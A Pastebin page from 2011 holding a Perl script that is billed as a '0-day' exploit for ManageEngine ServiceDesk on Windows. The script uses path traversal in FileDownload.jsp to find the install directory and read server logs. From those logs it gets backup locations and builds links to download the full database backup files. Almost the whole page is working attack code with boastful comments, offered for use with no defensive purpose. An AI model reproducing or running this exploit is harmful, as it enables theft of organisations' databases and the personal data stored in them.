Guest User

Exploit for ServiceDesk v *.* OS: Windows

a guest
Jul 7th, 2011
605
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. use LWP::UserAgent;
  3. use File::stat;
  4.  
  5. $ptxt="
  6. #################################################
  7. # _____             _         ____          _  
  8. #|   __|___ ___ _ _|_|___ ___|    \ ___ ___| |_
  9. #|__   | -_|  _| | | |  _| -_|  |  | -_|_ -| '_|
  10. #|_____|___|_|  \_/|_|___|___|____/|___|___|_,_|
  11. #                                            
  12. #################################################
  13.  
  14. [0-day] [Database disclosure]
  15. [desc: Exploit for ServiceDesk v *.* OS: Windows]
  16.  
  17. ";
  18. print $ptxt;
  19.  
  20. $ua=LWP::UserAgent->new();
  21.  
  22. $url="http://127.0.0.1";
  23. $path="/workorder/FileDownload.jsp";
  24.  
  25.  
  26. $installPath=&getInstallPathWin($url,$path);
  27.  
  28. if ($installPath ne "") {
  29.     @backups=&getServerOutLogs($url,$path,$installPath);
  30. } else {
  31.     print "Install path not found :(\n";
  32.     exit();
  33. }
  34.  
  35. if (scalar(@backups)>0) {
  36.     print "hehe.. We got paths to backup files..\n If they are on the same drive and exists - we will own their world!!\n";
  37.     foreach $backLine (@backups) {
  38.         @backInfo=split(/ --- /,$backLine);
  39.         #print "Trying to download $backInfo[1] from $backInfo[0]...\n";
  40.         &downloadBackups($url,$path,$backLine);
  41.     }
  42. }
  43. unlink("bad");
  44.  
  45. print "Dude, check out \'db_backups.html\'\n";
  46.  
  47.  
  48. sub downloadBackups {
  49.     my ($url,$path,$backLine) = @_;
  50.     @backInfo=split(/ --- /,$backLine);
  51.     $backupUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\$backInfo[0]$backInfo[1]";
  52.     #$br=$ua->get($backupUrl);
  53.     #if ($br->is_success) {
  54.     #   open(A,">$backInfo[1]");
  55.     #   print A $br->content;
  56.     #   close(A);
  57.     #}
  58.     open(A,">>db_backups.html");
  59.     print A "<a href='$backupUrl'>$backInfo[1]</a><br>\n";
  60.     close(A);
  61. }
  62.  
  63.  
  64.  
  65. sub getServerOutLogs {
  66.     my ($url,$path,$installPath) = @_;
  67.    
  68.     $badUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\${installPath}server\\default\\log\\serverout11111111111${i}.txt";
  69.     $br=$ua->get($badUrl);
  70.     if ($br->is_success) {
  71.         open(A,">bad");
  72.         print A $br->content;
  73.         close(A);
  74.     }
  75.  
  76.     for ($i=0;$i<=10;$i++) {
  77.         $logUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\${installPath}server\\default\\log\\serverout${i}.txt";
  78.         $br=$ua->get($logUrl);
  79.         if ($br->is_success) {
  80.             open(A,">${i}.txt");
  81.             print A $br->content;
  82.             close(A);
  83.             if (stat("bad")->size!=stat("${i}.txt")->size) {
  84.             } else {
  85.                 unlink("${i}.txt");
  86.             }
  87.         }
  88.     }
  89.  
  90.     for ($i=0;$i<=10;$i++) {
  91.         if (-e "${i}.txt") {
  92.             open(A,"${i}.txt");
  93.             @log=<A>;
  94.             close(A);
  95.             foreach $line (@log) {
  96.                 if ($line=~/: Build number(.*): ([0-9]+)\|/) {
  97.                     $tBuild=$2;
  98.                     if ($sdBuild eq "") {
  99.                         $sdBuild=$tBuild;
  100.                     }
  101.                 }
  102.                 if ($line=~/\[([0-9]+):([0-9]+):([0-9]+):([0-9]+)\]\|\[([0-9]+)-([0-9]+)-([0-9]+)\]\|\[SYSOUT\](.*)BACKUPDIR=(.*), ATTACHMENT=/) {
  103.                     push(@backups,"$9 --- backup_servicedesk_XBUILDX_database_${5}_${6}_${7}_${1}_${2}.data");
  104.                    
  105.                 }
  106.             }
  107.             unlink("${i}.txt");
  108.         }
  109.     }
  110.    
  111.     if (scalar(@backups)>0) {
  112.         print "Man, you are realy lucky! We found some info about ServiceDesk backups..\nBUT, I need your help now, hehe\nLet's construct directories!\np.s. type without drive letter, like \\backup\\\n";
  113.     } else {
  114.         print "Bad luck.. Check your karma, seriously..Where is my fucking latte!?!?\np.s. No info about backups was found :(";
  115.         exit();
  116.     }
  117.    
  118.     foreach $mb (@backups) {
  119.         $mb=~s/XBUILDX/$sdBuild/gi;
  120.         @dir=split(/ --- /,$mb);
  121.         print "Trash Dir: $dir[0]\n";
  122.         print "Right Dir: ";
  123.         chomp($rDir=<STDIN>);
  124.         if ($rDir ne "") {
  125.             $fullDB=$dir[1];
  126.             $fullDB=~s/database/fullbackup/gi;
  127.             push(@backupFiles,"$rDir --- $dir[1]");
  128.             push(@backupFiles,"$rDir --- $fullDB");
  129.         }
  130.     }
  131.     return @backupFiles;
  132. }
  133.  
  134.  
  135.  
  136.  
  137. sub getInstallPathWin {
  138.     my ($url,$path) = @_;
  139.     $url1="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\";
  140.     @paths=("ServiceDesk\\","ManageEngine\\ServiceDesk\\");
  141.     @checkFiles=("dashgjifyq8412348fhsjfghjqw.txt","COPYRIGHT","logs\\configport.txt","bin\\run.bat","server\\default\\log\\boot.log");
  142.     $i=0;
  143.     foreach $p (@paths) {
  144.         $k=0;
  145.         foreach $f (@checkFiles) {
  146.             $checkUrl="${url1}${p}${f}";
  147.             $br=$ua->get($checkUrl);
  148.             if ($br->is_success) {
  149.                 open(A,">${i}${k}");
  150.                 print A $br->content;
  151.                 close(A);
  152.             }
  153.             $k++;
  154.         }
  155.         $i++;
  156.     }
  157.     for ($i=0;$i<scalar(@paths);$i++) {
  158.         $ok=0;
  159.         for ($k=0;$k<scalar(@checkFiles);$k++) {
  160.             if (-e "${i}${k}") {
  161.                 if ($k==0) {
  162.                     $incorrectSize=stat("${i}${k}")->size;
  163.                 } else {
  164.                     if (stat("${i}${k}")->size!=$incorrectSize) {
  165.                         $ok++;
  166.                     }
  167.                 }
  168.             }
  169.         }
  170.         if ($ok>0) {
  171.             if ($ok==4) {
  172.                 print "You are lucky! \nServiceDesk installed to: $paths[$i]\n";
  173.                 $ret=$paths[$i];
  174.             } elsif ($ok>2) {
  175.                 print "I think ServiceDesk installed to: $paths[$i]\n";
  176.                 $ret=$paths[$i];
  177.             } elsif ($ok>1) {
  178.                 print "You are lucky if ServiceDesk installed to: $paths[$i]\n";
  179.                 $ret=$paths[$i];
  180.             }
  181.         }
  182.     }
  183.  
  184.  
  185.     for ($i=0;$i<scalar(@paths);$i++) {
  186.         for ($k=0;$k<scalar(@checkFiles);$k++) {
  187.             unlink("${i}${k}");
  188.         }
  189.     }
  190.  
  191.     if ($ret eq "") {
  192.         print "Bad luck man :\/\n";
  193.         $ret=0;
  194.     }
  195.     return $ret;
  196. }
RAW Paste Data